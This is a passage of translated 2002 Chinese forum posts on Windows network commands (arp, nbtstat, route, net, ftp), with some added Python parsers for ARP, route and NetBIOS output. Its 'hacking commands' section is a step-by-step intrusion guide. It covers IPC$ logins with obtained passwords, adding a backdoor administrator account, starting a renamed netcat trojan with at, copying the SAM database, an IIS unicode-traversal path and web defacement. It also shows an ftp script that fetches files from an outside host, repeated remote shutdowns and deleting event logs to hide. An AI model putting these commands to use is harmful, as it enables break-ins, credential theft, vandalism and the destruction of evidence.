  192.168.0.10          00-00-00-11-22-33     static
  192.168.0.68          -80-c8-ad-d2-cd       dynamic
  192.168.0.255         12-50-ba-00-22-98     dynamic

C:\> arp -d 192.168.0.10

C:\> arp -a

Interface: 192.168.0.65 on Interface 0x02
  Internet Address      Physical Address      Type
  192.168.0.68          -80-c8-ad-d2-cd       dynamic
  192.168.0.255         12-50-BA-00-22-98     dynamic
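As an added example (not from the original article), here is a small Python parser for an arp -a listing like the one above that also performs the check a defender wants when looking at the cache: which entries are pinned with arp -s, what MAC is cached for a given IP, and whether one physical address is answering for several IPs. The sample cache text and its MAC values are constructed, not taken from the page.

```python
import re
from collections import defaultdict

# Constructed sample of Windows "arp -a" output in the layout of the listing above.
# The MAC values are made up (not the page's); one MAC deliberately appears for two
# IPs, and 192.168.0.10 is shown as it looks after "arp -s".
SAMPLE_ARP_A = """\
Interface: 192.168.0.65 on Interface 0x2
  Internet Address      Physical Address      Type
  192.168.0.1           00-80-c8-ad-d2-cd     dynamic
  192.168.0.10          00-00-00-11-22-33     static
  192.168.0.68          00-80-c8-ad-d2-cd     dynamic
  192.168.0.255         ff-ff-ff-ff-ff-ff     static
"""

BROADCAST_MAC = "ff-ff-ff-ff-ff-ff"

IFACE_RE = re.compile(r"^Interface:\s*(\d+\.\d+\.\d+\.\d+)", re.IGNORECASE)
ENTRY_RE = re.compile(
    r"^\s*(\d+\.\d+\.\d+\.\d+)\s+"           # Internet Address
    r"([0-9a-f]{2}(?:-[0-9a-f]{2}){5})\s+"   # Physical Address, 6 hyphen-separated bytes
    r"(static|dynamic)\s*$",                 # Type
    re.IGNORECASE,
)


def parse_arp_a(text):
    """Parse 'arp -a' output into (interface_ip, ip, mac, type) tuples."""
    entries = []
    iface = None
    for line in text.splitlines():
        m = IFACE_RE.match(line)
        if m:
            iface = m.group(1)
            continue
        m = ENTRY_RE.match(line)
        if m:
            ip, mac, kind = m.groups()
            entries.append((iface, ip, mac.lower(), kind.lower()))
    return entries


def mac_for(entries, ip):
    """MAC currently cached for ip, or None (compare it with the MAC you expect)."""
    for _iface, entry_ip, mac, _kind in entries:
        if entry_ip == ip:
            return mac
    return None


def static_entries(entries):
    """IPs pinned with 'arp -s'; these never age out, so keep the list short and known."""
    return sorted(ip for _iface, ip, _mac, kind in entries if kind == "static")


def macs_with_multiple_ips(entries):
    """MACs that answer for more than one IP, mapped to the sorted IPs.

    One physical address claiming several IPs (other than broadcast) is the
    classic symptom of ARP cache poisoning, or of a proxy-ARP device; either
    way it deserves a look before the cache is trusted."""
    by_mac = defaultdict(set)
    for _iface, ip, mac, _kind in entries:
        if mac != BROADCAST_MAC:
            by_mac[mac].add(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}


if __name__ == "__main__":
    cache = parse_arp_a(SAMPLE_ARP_A)
    for iface, ip, mac, kind in cache:
        print(f"{iface}  {ip:<15} {mac}  {kind}")
    print("static:", static_entries(cache))
    print("suspicious:", macs_with_multiple_ips(cache))
```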
Reference for this command: http://www.pconline.com.cn/pcedu/soft/lan/jywgl/10207/79487.html
----------------------------------------------------------
Author: Tiger   Date: 2002-11-09
Content:

NBTSTAT

I. Basics

netstat and nbtstat can be called network diagnostic tools (the netstat command is a Windows subsystem for querying one kind of information; the nbtstat command is used to view the current state of NetBIOS-over-TCP/IP connections). They can be used once the TCP/IP protocol is installed.

Usage: Displays protocol statistics and current TCP/IP connections using NBT (NetBIOS over TCP/IP). (A diagnostic command that uses NBT to display protocol statistics and current TCP/IP connections.)
NBTSTAT [-a RemoteName] [-A IP address] [-c] [-n] [-r] [-R] [-RR] [-s] [-S] [interval]
-a (adapter status)   Lists the remote machine's name table given its name. (Uses the remote computer's name to list its name table.)
-A (adapter status)   Lists the remote machine's name table given its IP address. (Uses the remote computer's IP address to list its name table. Not much different: -a already covers this.)
-c (cache)   Lists NBT's cache of remote [machine] names and their IP addresses. (Shows the contents of the NetBIOS name cache, giving the IP address of each name.)
-n (names)   Lists local NetBIOS names.
-r (resolved)   Lists names resolved by broadcast and via WINS. (Names resolved and registered by broadcast or by WINS.)
-R (reload)   Purges and reloads the remote cache name table. (Clears all names from the NetBIOS name cache and reloads the LMHOSTS file; this parameter clears the cache you can see with nbtstat -c.)
-S (sessions)   Lists the sessions table with the destination IP addresses. (Shows the client and server sessions, listing remote computers by IP address.)
-s (sessions)   Lists the sessions table, converting destination IP addresses to computer NetBIOS names. (Shows the client and server sessions and tries to convert the remote computer's IP address into a name from the HOSTS file. Almost the same as -S, except that this gives the other side's NetBIOS name.)
-RR (ReleaseRefresh)   Sends name release packets to WINS and then starts refresh. (Releases the NetBIOS names registered on the WINS server, then refreshes their registration.)
RemoteName   Remote host machine name.
IP address   Dotted decimal representation of the IP address.
interval   Redisplays selected statistics, pausing interval seconds between each display. Press Ctrl+C to stop redisplaying statistics. (If this parameter is omitted, nbtstat prints the current configuration information once.)
II. Examples

1. View connection status

C:\> nbtstat -a adsl1688

Local Area Connection 3:
Node IpAddress: [218.76.4.35] Scope Id: []

           NetBIOS Remote Machine Name Table

       Name               Type         Status
    ---------------------------------------------
    ADSL1688       <00>  UNIQUE      Registered
    WORKGROUP      <00>  GROUP       Registered
    WORKGROUP      <1E>  GROUP       Registered
    ADSL1688       <20>  UNIQUE      Registered
    ............................
    MAC Address = 44-45-53-54-77-77

Local Area Connection:
Node IpAddress: [192.168.0.65] Scope Id: []

           NetBIOS Remote Machine Name Table

       Name               Type         Status
    ---------------------------------------------
    ADSL1688       <00>  UNIQUE      Registered
    WORKGROUP      <00>  GROUP       Registered
    WORKGROUP      <1E>  GROUP       Registered
    ADSL1688       <20>  UNIQUE      Registered
    WORKGROUP      <1D>  UNIQUE      Registered
    LIUQUCH        <03>  GROUP       Registered
    ADSL1688       <03>  UNIQUE      Registered

    MAC Address = 00-07-53-00-4E-B7

From this you can tell that my computer's NetBIOS name is ADSL1688, that it is in the WORKGROUP workgroup, and that the user liuquch is currently logged on to it; heh, it all comes out. The same can be done with NBTSTAT -A 192.168.0.65, and the result is the same as above.
2. List the cache contents

C:\> nbtstat -c

Local Area Connection 3:
Node IpAddress: [218.76.4.35] Scope Id: []

    No names in cache

Local Area Connection:
Node IpAddress: [192.168.0.65] Scope Id: []

                  NetBIOS Remote Cache Name Table

        Name              Type       Host Address        Life [sec]
    ------------------------------------------------------------
    WORKGROUP      <20>  UNIQUE      192.168.0.68        5597

From this you can tell that the computer you just had a NetBIOS session with is 192.168.0.68. Oh, I should mention that after breaking into a host, this command gives the "hacker" a useful clue for getting into the internal network.
3. Display connection session contents

C:\> nbtstat -S

Local Area Connection 3:
Node IpAddress: [218.76.4.35] Scope Id: []

    NetBIOS Connection Table

    Local Name             State    In/Out  Remote Host           Input   Output
    ----------------------------------------------------------------------------
    ADSL1688       <03>  Listening

Local Area Connection:
Node IpAddress: [192.168.0.65] Scope Id: []

    NetBIOS Connection Table

    Local Name             State    In/Out  Remote Host           Input   Output
    ----------------------------------------------------------------------------
    ADSL1688       <00>  Connected  Out     192.168.0.10          4MB     125KB
    ADSL1688       <03>  Listening
    LIUQUCH        <03>  Listening
    ..................................

From the above, this computer is currently exchanging data with 192.168.0.68; check whether files are being copied, and whether they are being copied from the other side to your computer. (Note: the data shown above has been altered, just in case; be careful.)
----------------------------------------------------------
Author: Tiger   Date: 2002-11-09
Content:

ROUTE

I. Basics

route is used to display, add and modify entries in the routing table by hand. We know that when we surf the Internet we do not communicate directly with the host we want to reach; the traffic passes through many routers, which we can see when we use the ping command. Take an example: to reach sina.com, the packets are forwarded to our local machine along one path, but other paths could have been chosen; the router simply picks the shortest path it currently knows. Now, if we have found another host and want it to come in by way of the "broiler" (the compromised host), we can use the route command to modify the routing table entries so that it takes the path we designate. (What's written above is pretty bad; I gave a better explanation below, but didn't want to delete this paragraph, so it stays.)

Most hosts reside on a network segment connected to only one router. Since there is only one router, there is no question of which router to use to send a datagram to a remote computer: the router's IP address can be entered as the default gateway of every computer on the segment. However, when there are two or more routers on the network, you cannot just rely on the default gateway. In fact, you may want traffic for some remote IP addresses to pass through one particular router while other remote IPs go through another router. In this case you need the corresponding routing information, which is stored in the routing table; each host and each router has its own routing table. Most routers use dedicated routing protocols to exchange and dynamically update the routing tables between routers. In some cases, however, entries must be added by hand to the routing tables on routers and hosts. route is used to display, manually add and modify routing table entries.
Usage: route [-f] [-p] [command [destination] [mask netmask] [gateway] [metric metric] [if interface]]

-f   Clears the routing tables of all gateway entries. If this is used in conjunction with one of the commands, the tables are cleared prior to running the command.
-p   When used with the add command, makes a route persistent across boots of the system. By default, routes are not preserved when the system is restarted. When used with the print command, displays the list of registered persistent routes. Ignored for all other commands, which always affect the appropriate persistent routes. This option is not supported in Windows 95.
command   One of these:
   print    Prints a route
   add      Adds a route
   delete   Deletes a route
   change   Modifies an existing route
destination   Specifies the host.
mask   Specifies that the next parameter is the 'netmask' value.
netmask   Specifies a subnet mask value for this route entry. If not specified, it defaults to 255.255.255.255.
gateway   Specifies the gateway.
interface   The interface number for the specified route.
metric   Specifies the metric, i.e. the cost for the destination. (The number of hops.)

All symbolic names used for destination are looked up in the network database file NETWORKS. The symbolic names for gateway are looked up in the host name database file HOSTS. If the command is print or delete, destination or gateway can be a wildcard (the wildcard is specified as a star '*'), or the gateway argument may be omitted.

II. Examples

This command is not well suited to examples, so explanation is mixed in.
1. tracert -d www.sina.com.cn shows all the hops from my host to www.sina.com.cn; there are 11 of them.

2. Display the current entries in the routing table:

C:\> route print
===========================================================================
Interface List
..............................

This shows the same routing information as netstat -r.

3. Add an entry to the routing table: route add

Suppose Sina's IP address is 61.145.113.87 and we reach it in 11 hops, and that the host we found (to put it plainly, the broiler) has IP xxx.xxx.xxx.xxx with subnet mask 255.255.255.224. We can achieve our goal with:

route add 61.145.113.87 mask 255.255.255.224 xxx.xxx.xxx.xxx metric 11

4. Change a route: route change

This parameter can change the path the data takes, but cannot change the data's destination. By the same logic, we can choose a shorter path. For example, we just made the route to sina.com take a detour; now I don't want it to go so far around, so do the following:

route add 61.145.113.87 mask 255.255.255.224 61.187.255.81 metric 4

Four hops is of course much faster than eleven, isn't it?

5. Remove a route from the routing table: route delete
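The route add and route change examples above rest on how a host chooses a route: the longest matching prefix wins, and among equal prefixes the lowest metric. The Python below, added here and not part of the original article, parses a route print table (constructed, with a placeholder gateway 203.0.113.9 rather than the page's xxx.xxx.xxx.xxx) and models route add, so you can see which gateway 61.145.113.87 uses before and after the page's command; it also shows that mask 255.255.255.224 covers a 32-address block rather than a single host.

```python
import ipaddress

# Constructed "route print" table in the layout of Windows 2000 (the gateway values
# are placeholders, not addresses from the page).
SAMPLE_ROUTE_PRINT = """\
Active Routes:
Network Destination        Netmask          Gateway       Interface  Metric
          0.0.0.0          0.0.0.0     192.168.0.1    192.168.0.65       1
        127.0.0.0        255.0.0.0       127.0.0.1       127.0.0.1       1
      192.168.0.0    255.255.255.0    192.168.0.65    192.168.0.65       1
     192.168.0.65  255.255.255.255       127.0.0.1       127.0.0.1       1
    192.168.0.255  255.255.255.255    192.168.0.65    192.168.0.65       1
  255.255.255.255  255.255.255.255    192.168.0.65    192.168.0.65       1
Default Gateway:       192.168.0.1
"""


def parse_route_print(text):
    """Return routes as (network, gateway, interface, metric) from 'route print' text."""
    routes = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue                       # headers, separators, 'Default Gateway:'
        try:
            net = ipaddress.IPv4Network((parts[0], parts[1]), strict=False)
            gateway = ipaddress.IPv4Address(parts[2])
            iface = ipaddress.IPv4Address(parts[3])
            metric = int(parts[4])
        except ValueError:
            continue                       # a five-word line that is not a route
        routes.append((net, gateway, iface, metric))
    return routes


def route_add(routes, destination, mask, gateway, metric):
    """Model 'route add <destination> mask <mask> <gateway> metric <metric>'.

    Host bits under the mask are cleared, so the page's mask 255.255.255.224
    turns 61.145.113.87 into the 32-address block 61.145.113.64/27; a route for
    one host needs mask 255.255.255.255 (the default when mask is omitted)."""
    net = ipaddress.IPv4Network((destination, mask), strict=False)
    return routes + [(net, ipaddress.IPv4Address(gateway), None, metric)]


def select_route(routes, destination):
    """Longest-prefix match, then lowest metric: how the host picks the next hop.

    Returns the winning (network, gateway, interface, metric), or None."""
    dest = ipaddress.IPv4Address(destination)
    candidates = [r for r in routes if dest in r[0]]
    if not candidates:
        return None
    return max(candidates, key=lambda r: (r[0].prefixlen, -r[3]))


if __name__ == "__main__":
    table = parse_route_print(SAMPLE_ROUTE_PRINT)
    before = select_route(table, "61.145.113.87")
    print("before:", before[0], "via", before[1], "metric", before[3])
    table = route_add(table, "61.145.113.87", "255.255.255.224", "203.0.113.9", 11)
    after = select_route(table, "61.145.113.87")
    print("after: ", after[0], "via", after[1], "metric", after[3])
```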
----------------------------------------------------------
Author: Tiger   Date: 2002-11-09
Content:

NET

The syntax of this command is: the available commands include

NET ACCOUNTS   NET COMPUTER   NET CONFIG   NET CONFIG SERVER   NET CONFIG WORKSTATION
NET CONTINUE   NET FILE   NET HELP   NET HELPMSG   NET LOCALGROUP   NET NAME
NET PAUSE   NET PRINT   NET SESSION   NET SHARE   NET START   NET STATISTICS
NET STOP   NET TIME   NET USE   NET VIEW

NET HELP SERVICES lists the network services that users can start. NET HELP SYNTAX explains how to read NET HELP syntax lines. NET HELP command | MORE displays help one screen at a time.

A. NET VIEW

The syntax of this command is:

NET VIEW [\\computername | /DOMAIN[:domainname]]
NET VIEW /NETWORK:NW [\\computername]

NET VIEW is used to display a list of shared resources on a computer. When used without options, it displays a list of computers in the current domain or network. \\computername is the computer whose shared resources the user wants to browse. /DOMAIN:domainname specifies the domain in which the user wants to browse the available computers; if the domain name is omitted, all domains on the local area network are displayed. /NETWORK:NW displays all available servers on the NetWare network; if a computer name is given, the resources available on that computer in the NetWare network are displayed. For example, if you know a remote computer ***.***.**.*** has shared resources, run net view \\***.***.**.***.

B. NET USE

The syntax of this command is:

NET USE [devicename | *] [\\computername\sharename[\volume] [password | *]] [/USER:[domainname\]username] [[/DELETE] | [/PERSISTENT:{YES | NO}]]
NET USE [devicename | *] [password | *] [/HOME]
NET USE [/PERSISTENT:{YES | NO}]

NET USE connects the computer to a shared resource, or disconnects the computer from a shared resource. When used without options, it lists the connections of your computer.
devicename   Specifies a name for the connection to the resource, or the device to be disconnected. There are two kinds of device names: disk drives (D: through Z:) and printers (LPT1: through LPT3:). Enter an asterisk instead of a specific device name to assign the next available device name.
\\computername   The name of the computer that controls the shared resource. If the computer name contains blank characters, enclose the double backslash (\\) and the computer name in quotation marks (""). The computer name may have 1 to 15 characters.
\sharename   The network name of the shared resource.
\volume   Specifies a NetWare volume on the server. You must have Client Services for NetWare (Windows NT Workstation) or Gateway Services for NetWare (Windows NT Server) installed and be connected to the NetWare server.
password   The password needed to access the shared resource.
*   Produces a prompt for the password. The password is not displayed when you type it at the password prompt.
/USER   Specifies a different username with which the connection is made.
domainname   Specifies another domain. If the domain is omitted, the current logged-on domain is used.
username   Specifies the username with which to log on.
/HOME   Connects a user to their home directory.
/DELETE   Cancels a network connection and removes the connection from the list of persistent connections.
/PERSISTENT   Controls the use of persistent network connections. The default is the setting used last. YES saves connections as they are made and restores them at the next logon. NO does not save the connection being made or subsequent connections; existing connections will be restored at the next logon. Use the /DELETE switch to remove persistent connections.
----------------------------------------------------------
Author: Tiger   Date: 2002-11-09
Content:

Several commonly used hacking commands

These are generally needed; if it's badly written, don't laugh. I don't think it is all that useful, and I won't write unrealistic articles like others do. Of course this is just my own view, and I have my shortcomings too.

1: NET
As long as you have an IP, a username and a password, you can connect to it with IPC$!
Here, suppose the user you obtained is HBX, the password is 123456, and the other side's IP is 127.0.0.1:

net use \\127.0.0.1\ipc$ "123456" /user:"HBX"

The command to exit is:

net use \\127.0.0.1\ipc$ /delete
The following operations must be used after logging in; the method of logging in is above.
----------------------
Next we explain how to create a user, because SA's privileges are equivalent to the system's superuser.
We add a user heibai with the password lovechina:

net user heibai lovechina /add

As long as the command reports success, we can add him to the Administrators group:

net localgroup administrators heibai /add
----------------------
Next, map the other side's C drive. Of course other drives work too, as long as they exist. We map the other side's C drive to the local Z drive:

net use z: \\127.0.0.1\c$
----------------------
net start telnet

This starts the other side's Telnet service.
----------------------
Next, activate the Guest user. Guest is NT's default user and cannot be deleted? I'm not sure; on my Windows 2000 it was deleted.

net user guest /active:yes
----------------------
Next, change a user's password. We change the Guest password to lovechina; other users work too, as long as you have the permission!

net user guest lovechina

The NET command really is powerful!
2: AT
Generally an intruder leaves a back door after breaking in, that is, a Trojan. You have uploaded the Trojan; how do you start it?
Then you need the AT command. Here we assume you have already logged on to that server.
You first have to get the other side's time:

net time \\127.0.0.1

It returns a time; here assume the time is 12:01. Now you need to create a job, with ID = 1:

at \\127.0.0.1 12:03 nc.exe

It is assumed here that the Trojan is named nc.exe and is already on the other side's machine.
NC here is short for Netcat; it is generally renamed for ease of typing. It is a Telnet service on port 99.
Wait until 12:03 and you can connect to the other side's port 99. This is how you plant the Trojan on the other side.
3: TELNET
This command is very practical: it can connect to a remote machine, but it needs a username and password. If you have given the other side a Trojan, though, connect directly to the Trojan's port:

telnet 127.0.0.1 99

This connects to the other side's port 99. Then you can run commands on the other side; this is the broiler.
4: FTP
It can transfer your things to the other side. You can apply for a space that supports FTP upload; there are plenty in China. If you can't find one, I'll give you www.51.net, which is not bad. After we have applied, ... and the FTP server.
Before you upload, you need to log in first. Here we assume the FTP server is www.51.net, the username is hucjs and the password is 654321:

ftp www.51.net

It will ask for the username, then the password, and after that you are in.
----------------------
Let's talk about uploading first. Assume the file you need to upload is index.htm, located under C:\, and you want to send it to the other side's D:\:

put c:\index.htm d:\

Suppose you want to fetch the index.htm under the other side's C:\ to your own machine's D:\:

get c:\index.htm d:\
5: COPY
Next, COPY. It requires that the connection established above is still valid.
Here we copy the index.htm under the local C drive to the C drive of 127.0.0.1:

copy index.htm \\127.0.0.1\c$\index.htm
----------------------
If you want to copy it to D, change the letter!

copy index.htm \\127.0.0.1\d$\index.htm
----------------------
If you have to copy it to the WINNT directory, just enter

copy index.htm \\127.0.0.1\admin$\index.htm

admin$ is WINNT.
----------------------
To copy the other side's files: let me tell you that NT's backup of the SAM database is in x:\winnt\repair\sam._ ; sam._ is the file name of the database.
Copy the database of 127.0.0.1 to the local C drive:

copy \\127.0.0.1\admin$\repair\sam._ c:\
----------------------
6: SET
If you have run into a machine and are thinking of hacking it (this idea only counts if, of course, its port 80 is open; otherwise forget it), you need the set command!
Here is the result I got. Let me analyse it: the point is just to find where the home page is.

COMPUTERNAME=PENTIUMII
ComSpec=D:\WINNT\system32\cmd.exe
CONTENT_LENGTH=0
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=*/*
HTTP_ACCEPT_LANGUAGE=zh-cn
HTTP_CONNECTION=Keep-Alive
HTTP_HOST=<the IP of the current visitor; this originally showed my IP, which I deleted>
HTTP_ACCEPT_ENCODING=gzip, deflate
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
NUMBER_OF_PROCESSORS=1
Os2LibPath=D:\WINNT\system32\os2\dll;
OS=Windows_NT
Path=D:\WINNT\system32;D:\WINNT
PATHEXT=.COM;.EXE;.BAT;.CMD
PATH_TRANSLATED=E:\VLROOT        <- this is where the home page is stored; as soon as you see PATH_TRANSLATED= you know the storage address of the home page, here E:\vlroot
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Family 6 Model 3 Stepping 3, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=0303
PROMPT=$P$G
QUERY_STRING=/c+set
REMOTE_ADDR=XX.XX.XX.XX
REMOTE_HOST=XX.XX.XX.XX
REQUEST_METHOD=GET
SCRIPT_NAME=/scripts/..%2f../winnt/system32/cmd.exe
SERVER_NAME=XX.XX.XX.XX
SERVER_PORT=80
SERVER_PORT_SECURE=0
SERVER_PROTOCOL=HTTP/1.1
SERVER_SOFTWARE=Microsoft-IIS/3.0        <- the other side uses IIS/3.0
SystemDrive=D:
SystemRoot=D:\WINNT
TZ=GMT-9
USERPROFILE=D:\WINNT\Profiles\Default User
windir=D:\WINNT

The line in pink is where the other side's home page is stored. Let me tell you a trick, a very stupid one, but it is the only way to find the name of the home page: when you dir this directory you will see a lot of files; enter XX.XX.XX.XX/filename in the browser for each of them, and the one that shows the same page as XX.XX.XX.XX is the home page.
7: NBTSTAT
If you have scanned an NT machine and one of its ports 136 to 139 is open, you have to use this command to get the users. By the way, this is NetBIOS. After getting the username you can guess the password, for example a relatively simple password, the word "password", or the username itself; try them all, and if none works there's no cracking it!
Nowadays there are many NT machines with these ports open. You can practise; we'll analyse the result.
Command:

nbtstat -A XXX.XXX.XXX.XXX

The -A must be capitalised.
The following is the result:

           NetBIOS Remote Machine Name Table

       Name               Type         Status
    ---------------------------------------------
    PENTIUMII      <00>  UNIQUE      Registered
    PENTIUMII      <20>  UNIQUE      Registered
    ORAHOTOWN      <00>  GROUP       Registered
    ORAHOTOWN      <1C>  GROUP       Registered
    ORAHOTOWN      <1B>  UNIQUE      Registered
    PENTIUMII      <03>  UNIQUE      Registered
    INET~SERVICES  <1C>  GROUP       Registered
    IS~PENTIUMII...<00>  UNIQUE      Registered
    ORAHOTOWN      <1E>  GROUP       Registered
    ORAHOTOWN      <1D>  UNIQUE      Registered
    ..__MSBROWSE__.<01>  GROUP       Registered

    MAC Address = 00-E0-29-14-35-BA

The name in pink is the user logged on to this system. Maybe you don't know how to read it: everyone sees a number; as long as this number is <03>, the name in front of it is the user.
The user here is PENTIUMII.
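Both nbtstat -A listings on this page (the ADSL1688 one earlier and this PENTIUMII one) are read by eye. The Python below, added here and not taken from the original article, parses such a name table, labels each suffix with what the host is advertising, and applies the page's "the <03> name is the user" rule together with the caveat it needs: the computer name itself is also registered with <03>, so only a <03> name that differs from the <00> computer name is a user. The sample table is a constructed copy of the ADSL1688 listing, with the LIUQUCH entry written as UNIQUE.

```python
import re

# Meaning of the NetBIOS name suffix (the <xx> byte) for the entries in the
# listings above; the key is (suffix, UNIQUE or GROUP).
SUFFIX_MEANING = {
    ("00", "UNIQUE"): "Workstation service (the computer name)",
    ("00", "GROUP"): "Domain or workgroup name",
    ("01", "GROUP"): "Master browser (..__MSBROWSE__.)",
    ("03", "UNIQUE"): "Messenger service (computer name or a logged-on user name)",
    ("1B", "UNIQUE"): "Domain master browser",
    ("1C", "GROUP"): "Domain controllers",
    ("1D", "UNIQUE"): "Master browser for this subnet",
    ("1E", "GROUP"): "Browser service elections",
    ("20", "UNIQUE"): "Server service (file and print sharing)",
}

# Constructed copy of the ADSL1688 table from the nbtstat article; the LIUQUCH <03>
# entry is written as UNIQUE here, which is how a logged-on user's name is registered.
SAMPLE_NBTSTAT = """\
Local Area Connection:
Node IpAddress: [192.168.0.65] Scope Id: []

           NetBIOS Remote Machine Name Table

       Name               Type         Status
    ---------------------------------------------
    ADSL1688       <00>  UNIQUE      Registered
    WORKGROUP      <00>  GROUP       Registered
    WORKGROUP      <1E>  GROUP       Registered
    ADSL1688       <20>  UNIQUE      Registered
    WORKGROUP      <1D>  UNIQUE      Registered
    ..__MSBROWSE__.<01>  GROUP       Registered
    LIUQUCH        <03>  UNIQUE      Registered
    ADSL1688       <03>  UNIQUE      Registered

    MAC Address = 00-07-53-00-4E-B7
"""

# The name may run straight into "<xx>" when it is 15 characters long.
ENTRY_RE = re.compile(r"^\s*(\S+?)\s*<([0-9A-Fa-f]{2})>\s+(UNIQUE|GROUP)\s+(\w+)", re.IGNORECASE)
MAC_RE = re.compile(r"MAC Address\s*=\s*([0-9A-Fa-f]{2}(?:-[0-9A-Fa-f]{2}){5})", re.IGNORECASE)


def parse_name_table(text):
    """Parse an 'nbtstat -A' name table into (entries, mac); entries are dicts."""
    entries, mac = [], None
    for line in text.splitlines():
        m = ENTRY_RE.match(line)
        if m:
            name, suffix, kind, status = m.groups()
            entries.append({"name": name.upper(), "suffix": suffix.upper(),
                            "type": kind.upper(), "status": status})
            continue
        m = MAC_RE.search(line)
        if m:
            mac = m.group(1).upper()
    return entries, mac


def computer_name(entries):
    """The host's own name is its <00> UNIQUE (Workstation service) entry."""
    for e in entries:
        if e["suffix"] == "00" and e["type"] == "UNIQUE":
            return e["name"]
    return None


def logged_on_user_candidates(entries):
    """<03> names that are not the computer's own name.

    The Messenger service registers the computer name and every logged-on user
    name with suffix <03>, so the page's rule only holds after the host's own
    <03> entry is excluded. That an unauthenticated remote query returns these
    at all is the reason to keep 137/udp unreachable from untrusted networks."""
    host = computer_name(entries)
    return sorted({e["name"] for e in entries if e["suffix"] == "03" and e["name"] != host})


def exposed_services(entries):
    """One readable line per entry: what the host advertises over NetBIOS."""
    lines = []
    for e in entries:
        meaning = SUFFIX_MEANING.get((e["suffix"], e["type"]), "unknown suffix")
        lines.append(f'{e["name"]:<16} <{e["suffix"]}> {e["type"]:<6} {meaning}')
    return lines


if __name__ == "__main__":
    names, mac = parse_name_table(SAMPLE_NBTSTAT)
    print("computer:", computer_name(names), "MAC:", mac)
    print("users:", logged_on_user_candidates(names))
    print("\n".join(exposed_services(names)))
```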
8: SHUTDOWN
The command to shut down the other side's NT server:

shutdown \\<IP address> /T:20

After 20 seconds the NT machine shuts down automatically, and then the command can be run again after another 20 seconds, which gives the other side a big loss. Have a conscience.
9: DIR
This command needs no explanation, but it is very important: it lists all the files and folders in a directory.
You can try it locally.
10: ECHO
The famous Unicode vulnerability: with this command you can simply deface a host that has this vulnerability.
Suppose we want to write "The Nanjing Massacre is an ironclad fact; no Japanese may deny it!":

echo The Nanjing Massacre is an ironclad fact; no Japanese may deny it! > index.htm
echo The Nanjing Massacre is an ironclad fact; no Japanese may deny it! >> index.htm

The first one overwrites the original contents of index.htm, writing "The Nanjing Massacre is an ironclad fact; no Japanese may deny it!" into index.htm.
The second one appends "The Nanjing Massacre is an ironclad fact; no Japanese may deny it!" to the inside of index.htm.
">>" appends the resulting content to the document; ">" overwrites the original file contents.
Everyone can try this locally.
Maybe you will ask, is defacing really this simple? In fact, it can also be used to download a home page into the other side's directory.
1. First we need to apply for a free home page.
2. Use echo to create a TXT file with the following contents (taking the chinaren server as an example):

open upload.chinaren.com      (the server your space provider gives you)
cnhack                        (your username from the application)
TEST                          (your password from the application)
get index.htm c:\inetpub\wwwroot\index.htm    (this downloads the index.htm on your space to c:\inetpub\wwwroot\index.htm)
bye                           (exits the FTP dialog, like DOS under Windows 98, where you exit DOS with EXIT)

Specifically: enter echo open upload.chinaren.com > c:\cnhack.txt, then echo cnhack >> c:\cnhack.txt, then echo 39Abs >> c:\cnhack.txt, then echo get index.htm c:\inetpub\wwwroot\index.htm >> c:\cnhack.txt, and finally ftp -s:c:\cnhack.txt (the ftp -s parameter executes the contents of the file).
When the command completes, the file has been downloaded to the location you specified.
Note: after obtaining the file, please delete cnhack.txt. (If you don't delete it, others can easily see your password.)
Remember: del c:\cnhack.txt
11: Attrib
This command sets file attributes. If you want to hack a site but its file has the read-only attribute set, that is very pitiful: you cannot do anything with it! But this command is not afraid of that.
attrib -r index.htm
This command removes the read-only attribute from index.htm.
If "-" is changed to "+", the attribute of the file is set to read-only.
----------------------
attrib +r index.htm
This command sets the attribute of index.htm to read-only.
12: DEL
Don't panic when you see this title! Now that I have to leave 127.0.0.1, of course I want to delete the logs; I don't want to be caught, ha ha.
The NT logs are these:
del C:\Winnt\System32\logfiles\*.*
del C:\WinNT\System32\Config\*.evt
del C:\WinNT\System32\DTCLOG\*.-
del C:\Winnt\System32\*.log
del C:\Winnt\System32\*.txt
del C:\WinNT\*.txt
del C:\WinNT\*.log
----------------------------------------------------------------------
Author: Tiger Date: 2002-11-09 Content: Encyclopedia of FTP commands
The FTP command is one of the commands Internet users use most often. Whether you use FTP under DOS or under a UNIX operating system, you will run into many FTP internal commands; being familiar with them and applying them flexibly is a great convenience to the user. For dial-up users, if the ISP provides a shell and you can use nohup, then FTP will be the download method that saves you the most money. The FTP command-line format is: ftp -v -d -i -n -g [hostname]
-v displays all response information from the remote server.
-d uses debugging mode.
-n suppresses FTP's automatic login, i.e. the .netrc file is not used.
-g cancels global file-name (wildcard) expansion.
The internal commands used by FTP are as follows (brackets denote optional parts):
1. ! [cmd [args]] Runs an interactive shell on the local machine; exit returns to the FTP environment, e.g. ! ls *.zip.
2. $ macro-name [args] Executes the macro definition macro-name.
3. account [password] Supplies the supplementary password required to access system resources after logging in to the remote system.
4. append local-file [remote-file] Appends a local file to a file on the remote host; if the remote file name is not specified, the local file name is used.
5. ascii Uses the ASCII transfer mode.
6. bell Rings the bell once after each command is executed.
7. bin Uses the binary transfer mode.
8. bye Exits the FTP session.
9. case During mget, converts upper-case letters in remote file names to lower case.
10. cd remote-dir Changes to the directory remote-dir on the remote host.
11. cdup Changes to the parent of the current remote directory.
12. chmod mode file-name Sets the permissions of the remote file file-name to mode, e.g. chmod 777 a.out.
13. close Terminates the FTP session with the remote server (the counterpart of open).
14. cr When transferring a file in ASCII mode, converts carriage-return line-feed into line-feed.
15. delete remote-file Deletes a file on the remote host.
16. debug [debug-value] Sets debugging mode, which displays each command sent to the remote host, e.g. debug 3; setting it to 0 cancels debugging.
17. dir [remote-dir] [local-file] Displays the remote host directory and stores the result in local-file.
18. disconnect Same as close.
19. form format Sets the file transfer form to format; the default is file.
20. get remote-file [local-file] Transfers the remote file remote-file to local-file on the local hard drive.
21. glob Toggles file-name expansion for mdelete, mget and mput; when off, file names are not expanded, like the -g command-line parameter.
22. hash Displays a hash symbol (#) for every 1024 bytes transferred.
23. help [cmd] Displays help for the FTP internal command cmd, e.g. help get.
24. idle [seconds] Sets the idle timer of the remote server to seconds.
25. image Sets the binary transfer mode (same as binary).
26. lcd [dir] Changes the local working directory to dir.
